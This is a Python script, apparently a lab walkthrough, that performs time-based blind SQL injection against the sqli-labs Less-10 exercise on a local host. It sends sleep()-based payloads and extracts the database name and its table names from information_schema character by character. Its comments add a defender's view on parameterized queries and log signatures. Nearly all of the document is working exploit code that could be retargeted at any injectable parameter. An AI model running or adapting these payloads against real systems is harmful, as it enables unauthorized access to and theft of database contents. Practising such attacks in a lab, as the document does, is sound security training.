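import string
import time

import requests

# Time-based blind SQL injection walkthrough against the sqli-labs Less-10
# exercise on a local lab host. The page is assumed to return no visible
# output, so every guess is confirmed only by whether the response is delayed.
#
# Defender's view: this only works where the `id` parameter reaches the SQL
# text unescaped; a parameterized query removes the injection point. In
# access logs the run shows up as a burst of near-identical GETs from one
# client whose query strings contain `sleep(`, `substr(` and
# `information_schema`, with response times split into "fast" and
# "about the sleep value".
url = 'http://192.168.28.133/sqli-labs-master/Less-10/?id=1" and '

# Candidate characters; the comma is included so that the separator
# group_concat() puts between table names can be matched too.
low = 'abcdefghijklmnopqrstuvw,xyz'


def _slower_than(full_url, threshold):
    """Send one GET and report whether it took longer than `threshold` seconds."""
    started = time.time()
    requests.get(full_url)
    return time.time() - started > threshold


# Step 1: length of the current database name (tries 0..9, stops at first hit).
a1 = 0
for a in range(10):
    if _slower_than(f"{url}if(length(database())={a},sleep(2),1)-- -", 1):
        a1 = a
        print(f'库名长度为{a1}')
        break

# Step 2: database name, one position at a time.
res1 = ''
for a2 in range(a1 + 1):
    for a3 in low:
        if _slower_than(f"{url}if(substr(database(),{a2},1)='{a3}',sleep(2),1)-- - ", 1):
            res1 += a3
print(f'库名为{res1}')

# Step 3: table names. There is no need to count the tables first;
# group_concat() returns all of them as one comma-separated string,
# which is read over positions 1..59.
res8 = []
res7 = ''
for a7 in range(1, 60):
    for a8 in low:
        if _slower_than(f"{url}if(substr((SELECT group_concat(table_name) from information_schema.tables where table_schema='{res1}'),{a7},1)='{a8}',sleep(3),1) ", 2):
            res7 += a8
res8.append(res7)
print(res8)
# The original printed `res4`, which is never defined (NameError);
# the database name is held in `res1`.
print(f'数据库{res1}有{res8}表')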
时间盲注脚本